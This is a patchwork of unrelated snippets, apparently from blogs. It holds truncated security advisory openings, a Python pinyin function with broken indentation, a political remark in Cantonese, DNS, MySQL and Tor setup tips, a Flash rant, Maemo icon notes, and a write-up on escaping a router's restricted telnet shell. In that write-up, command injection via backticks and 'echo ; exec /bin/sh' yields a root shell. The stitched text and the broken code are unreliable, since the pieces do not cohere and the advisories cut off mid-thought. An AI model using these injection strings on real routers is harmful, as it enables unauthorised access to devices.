Two issues have been found in the Apache HTTPD web server:

Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems:

It was discovered that in ejabberd, a distributed XMPP/Jabber server written in Erlang, a problem in ejabberd_c2s.erl allows remote authenticated users to cause a denial of service by sending a large number of c2s (client2server) messages; that triggers an overload of the queue, which in turn causes a crash of the ejabberd daemon.

Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. The Common Vulnerabilities and Exposures project identifies the following problems:

Sol Jerome discovered that kadmind service in krb5, a system for authenticating users and services on a network, allows remote authenticated users to cause a denial of service (daemon crash) via a request from a kadmin client that sends an invalid API version number.

def getPY(s):
try: chr=s.encode("GB18030")
except: return s
if chr<"\xb0\xa1": return s
if chr>"\xd7\xf9": return u"?"
if chr<"\xb0\xc5": return u"a"
if chr<"\xb2\xc1": return u"b"
if chr<"\xb4\xee": return u"c"
if chr<"\xb6\xea": return u"d"
if chr<"\xb7\xa2": return u"e"
if chr<"\xb8\xc1": return u"f"
if chr<"\xb9\xfe": return u"g"
if chr<"\xbb\xf7": return u"h"
if chr<"\xbf\xa6": return u"j"
if chr<"\xc0\xac": return u"k"
if chr<"\xc2\xe8": return u"l"
if chr<"\xc4\xc3": return u"m"
if chr<"\xc5\xb6": return u"n"
if chr<"\xc5\xbe": return u"o"
if chr<"\xc6\xda": return u"p"
if chr<"\xc8\xbb": return u"q"
if chr<"\xc8\xf6": return u"r"
if chr<"\xcb\xfa": return u"s"
if chr<"\xcd\xda": return u"t"
if chr<"\xce\xf4": return u"w"
if chr<"\xd1\xb9": return u"x"
if chr<"\xd4\xd1": return u"y"
if chr<"\xd7\xfa": return u"z"
return s

一個唔相信民主嘅所謂”民主黨”今日自己宣佈咗佢自己嘅末日!!

上星期 Google 開放了類似 OpenDNS 的 DNS服務，以下是 DNS 的 IP:

8.8.8.8
8.8.4.4

在 Linux 下如果要改用 Google 的 DNS，只要修改 /etc/resolv.conf 檔案，將原本使用的 DNS 改成以下即可:

nameserver 8.8.8.8
nameserver 8.8.4.4

可能是因為 Google 的用戶群龐大，其 DNS 內的 cache 也較豐富，所以很多時瀏覽網站時，感覺 resolve 的時間也很快，比自己 ISP 的反應更佳。但大家要留意，當使用 Google 的 DNS 時，實際上上網的紀錄 Google 也可以知道，關心私穩方面問題的朋友要留意了。

以下會介紹一些簡易的 MySQL 效能微調技巧，這些方法都是透過 my.cnf 的參數完成，而不需要重新編譯 MySQL。

Key Buffer
key buffer 是系統索引可用的緩存空間大小，對處理索引有很大的影響。設定 key buffer 的大小要根據自己的需要而定，而一個較簡單的方法是使用 25% 的記憶體空間作為 key buffer 使用。如果是獨立的資料庫伺服器可考慮使用更大的空間，例如 50%。
通這設定 key buffer 的大小，可以減少硬碟 I/O 操作對 MySQL 的影響。

以下是 key buffer 在 my.cnf 的設定方法：

key_buffer = 512M

Query Cache
這是 SQL Query 的緩存，將 query 的查詢結果暫存在記憶體裡面，直至資料被更新為止。

query_cache_size = 128MB
query_cache_limit = 4MB

Table Cache
對於同時要存取多個資料表十分重要，這是設定同時可開啟資料表的數目。

table_cache = 512

Sort Buffers
sort_buffer_size (在舊版本是 sort_buffer) 是設定 grouping 及 sorting 的緩存。

sort_buffer_size = 32M
myisam_sort_buffer_size = 32M

Step1: 获取网桥地址

用你的gmail帐号发送主题和内容为"get bridges"的邮件至bridges@torproject.org

Step2: 配置Tor网桥

首先，备份原Tor配置文件torrc至备份目录:

sudo cp -p /etc/tor/torrc your-backup-directory

然后在torrc配置文件末尾添加"UseBridges 1"开关选项(默认是0, 即关闭状态)，

UseBridges 1

UpdateBridgesFromAuthority 1

最后，将bridges@torproject.org回复邮件中的bridge列表附加至torrc配置文件末尾，请按回复邮件中的bridge的原有格式添加，即:

bridge ip:port fingerprint

上述两篇博客中谈到的邮件中有fingerprint字段，我收到的邮件中没有，但是测试后发现同样有效

Step3: 重启Tor和Privoxy

sudo /etc/init.d/tor restart
sudo /etc/init.d/privoxy restart

first post for test

I really fricking hate Flash. Not that you needed to be told this. It kind of looks nice when it works, except when it crashes your browser. It eats your CPU time and is buggy, there's a word we use to refer to software like that, it's 4 letters, starts in an s and ends in a t.

There's another reason not to like Flash though that's got less to do with the Flash program itself but more to do with how people use it. More than ever advertisers are using Flash to display animated or interactive advertising on webpages. That kind of nice in a way, I guess, because you can essentially build custom miniature apps in the advertising window. I do have a problem when advertising starts interfering with what I do. I mean, auto adverts with cars running across the screen? How about video adverts which pop up and plays automatically (with sound!) when you load a news site, or a sound-only advertising that plays in the background that has no stop button? I mean, really? Seriously, isn't that going too far? It's really distracting and really fricking annoying. I've always felt that advertising agencies have a general hate towards content consumers. I'll tell you the first thing I do when I see junk running across the screen or some video ad running just in the middle of when I'm reading the news, I tell the ad to f-off by clicking the "X" button in the corner (if there's one at all). Ads, sure, but not like this, thanks.

All thanks for a fairly prominent Sydney-based newspaper which recently started doing this and pushed me over the limit, I've now got Click to Flash installed in Safari. Now, Flash does not load automatically, it only loads when you click on the Flash window. Why don't browsers come with these things by default (by the way, Safari already has a checkbox which allows you to disable Flash), all browsers should have a "Webpage De-annoy-alizer" tab in the Preferences window that allows you to do things like this.

I had a hard time finding out which icon sizes one has to provide and
where to install them for Maemo applications (I'm currently developing
for OS2008 "chinook", might be different for other releases). Here is
what I found out by looking at the contents of other GUI packages:

26x26 icon goes to /usr/share/icons/26x26/hildon/appname.png
40x40 icon goes to /usr/share/icons/40x40/hilson/appname.png
64x64 icon goes to /usr/share/icons/scalable/hildon/appname.png

The 64x64 icon will be used in the menu, so be sure to make it really
64x64, otherwise the icon will look out of place in the menu. Also, be
sure to create an executable "postinst" file in the "debian/"
subdirectory of your package source that has at least the following
two commands:

gtk-update-icon-cache -f /usr/share/icons/hicolor
maemo-select-menu-location appname.desktop

Where of course "appname" is the name of your application and how you
named your icon and .desktop file.

The embedded routers available on the market these days are truly wonderful things. You buy one, it just works, you leave it there until there is a compelling reason to get a new one. Everybody is happy.

Oops! Just kidding! That's the way things ought to work, but it never days. Getting a router that works these days (perhaps with the exception of an Apple router, I guess) is largely a game of chance. Even doing due diligence by reading online reviews will not save you.

The particular one I have, a Dynalink RTA1046VW, which appears to be a rebadged Netcomm, does wireless and VOIP along with the usual Ethernet connection. The wireless would, however, fail every couple of days. It would just drop stone cold, and I'd have to reset it, but when I do the VOIP line would drop dead. This, gentle reader, in case you have not realized now, is very annoying. I thought the point of the wireless being there was so that you can use it?

Must be tough, writing router firmware, though I offer an alternative explanation. Maybe the hardware manufacturers of these routers simply do not give a damn about the quality of the software they stick inside these routers. A scary thought, millions of these devices powering the Intarwebs of the average Joe. Most of the time the poor quality manifests itself in things that won't work, like my wireless module. Sometimes they are a bit more egregious.

The particular router I have happens to run Linux. You don't find any mention of this or the fact that it uses GPL software, because it is not advertised as such. I am not a lawyer and do not know if you're required to acknowledge the fact that there's GPL software on the router, but for 10 bucks they do offer to send you a CD with source code on it.

I found it it ran Linux when I started poking around with the router when I wanted to find out whether there was some misconfiguration that caused the wireless to drop out every couple of days. They have the usual web interface but when I experimented with it, turns out they have a telnet interface. It drops you into a custom command prompt with a set of built-in commands. That's not unusual in itself, but the output was.

> ps
PID Uid VmSize Stat Command
1 admin 316 S init
2 admin SW< [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
17 admin SW [pdflush]
18 admin SW [pdflush]
19 admin SW [kswapd0]
20 admin SW< [aio/0]
[etc]
>

Say, what? Busybox, is that you? Anyway, more on the ps output later. There's a surprising whole load of things that you can do even when you are in the crappy customized shell. For example, you can find out what kernel version it is running.

> cat /proc/version
Linux version 2.6.8.1 ( Compiled by michaelc) (gcc version 3.4.2) #1 Tue Apr 14 15:25:39 CST 2009
>

Linux 2.6.8.1 was released in 2004. I got this router in 2009. Dear firmware developer, what have you been doing for the last couple of years?

Back to the ps output. What makes the ps output particular interesting is not the output format per se but what it shows:

1126 admin 2404 S rvsip
1127 admin 2404 S rvsip
1128 admin 2404 S rvsip
1216 admin 988 S telnetd
1227 admin 312 S sh -c ps
1228 admin 332 R ps

It looks like they are using system(), which invokes sh -c, to call the ps command. With that in mind, I can do this:

1128 admin 2404 S rvsip
1216 admin 988 S telnetd
1229 admin 324 S sh -c ps `cat /proc/version`
1232 admin 332 R ps Linux version 2.6.8.1 ( Compiled by michaelc) (gcc

See? I just got the shell to run another command for me outside of the customized shell. That's not so interesting, but you can do useful things based on this. For example, the customized shell does not come with a ls command, but it does come with an echo command. So I can do this:

> echo /bin/*
/bin/adsl /bin/adslctl /bin/atm /bin/atmctl /bin/autoprovisionlan /bin/brctl /bin/busybox /bin/cat /bin/cfesetup /bin/cfm /bin/chmod /bin/date /bin/ddnsd /bin/df /bin/dhcpc /bin/dhcpd /bin/dhcpr /bin/dmesg /bin/dproxy /bin/dumpmem /bin/ebtables /bin/echo /bin/epi_ttcp /bin/ethctl /bin/false /bin/hotplug /bin/ifstat /bin/igmp /bin/ip /bin/iptables /bin/kill /bin/ln /bin/mkdir /bin/mount /bin/mpd /bin/msh /bin/nas /bin/nas4not /bin/netctl /bin/nstat /bin/ping /bin/pppd /bin/ps /bin/pvc2684ctl /bin/pvc2684d /bin/pwd /bin/rm /bin/rtacct /bin/rtstat /bin/rvsip /bin/sendarp /bin/setmem /bin/sh /bin/sntp /bin/ss /bin/sysinfo /bin/tc /bin/tftpd /bin/true /bin/udhcpd /bin/upnp /bin/voicectl /bin/wl /bin/wlctl
>

OK, this is really annoying. I want a shell.

> echo `/bin/sh`
(no output)

That was disappointing. However, from the output listed earlier we know sh -c is used to invoke busybox commands from the custom shell. The -c argument takes a line of arbitary shell commands, all you have to do is separate it with a semicolon! So, in theory, I should be able to run the /bin/sh command (or any arbitrary command) if I tacked on the command I wanted to run at the end.

> echo; exec /bin/sh
echo; exec /bin/sh: not found
>

OK, that didn't work. But what if I separated the echo command and the semi-colon with a space?

> echo ; exec /bin/sh

BusyBox v1.00 (2009.04.14-07:30+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

Aha! Success!

# help

Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat chmod
date df dmesg echo expr false ifconfig init insmod kill klogd
linuxrc ln logger logread mkdir mount msh ping ps pwd reboot
rm rmmod route sendarp sh sysinfo syslogd test tftp tftpd top
true tty vconfig

#

Next time, do yourself a favor and get a piece of hardware on which you can install custom software, it may require a bit more initial setup but is more likely to work and will almost not be shoddily cobbled together like mine.